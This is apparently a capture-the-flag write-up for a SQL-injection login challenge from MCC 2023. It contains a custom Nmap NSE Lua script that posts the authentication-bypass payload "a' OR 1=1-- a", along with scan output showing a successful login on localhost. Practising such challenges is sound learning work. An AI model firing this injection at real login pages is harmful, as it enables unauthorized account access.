This is a series where I will write my own Nmap NSE script to solve that challenge. This is actually a task given by masta ghimau during MCC 2023.
Challenge Solution#
Login level 1 is just a simple SQL injection. The hardest part is writing a custom NSE script.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
| local http = require "http"
local shortport = require "shortport"
portrule = shortport.http
action = function(host,port)
local resp,final,query
r={}
r['username']="a' OR 1=1-- a"
r['passwd']="test"
r['submit']="Submit"
resp = http.post(host,port,"/login-1/index.php",nil,nil,r)
final = string.match(resp.body, '<p>.*alert%-box.->(.-)<a.*</p>')
query = string.match(resp.body, ".*SQL Query(.*)<a.*</div>")
return {payload = r ,SQLQuery = query , result = final}
end
|
This code is built based on http-title.nse.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
| nmap -p 80 --script=chall1.nse 127.0.0.1
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-28 19:52 +08
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00013s latency).
PORT STATE SERVICE
80/tcp open http
| chall1:
| payload:
| submit: Submit
| passwd: test
| username: a' OR 1=1-- a
| SQLQuery: : SELECT * FROM users WHERE name='a' OR 1=1-- a' and password='test'
|_ result: Succesfully logged in.
Nmap done: 1 IP address (1 host up) scanned in 0.15 seconds
|
Things I learned from the challenge#
- Writing custom NSE script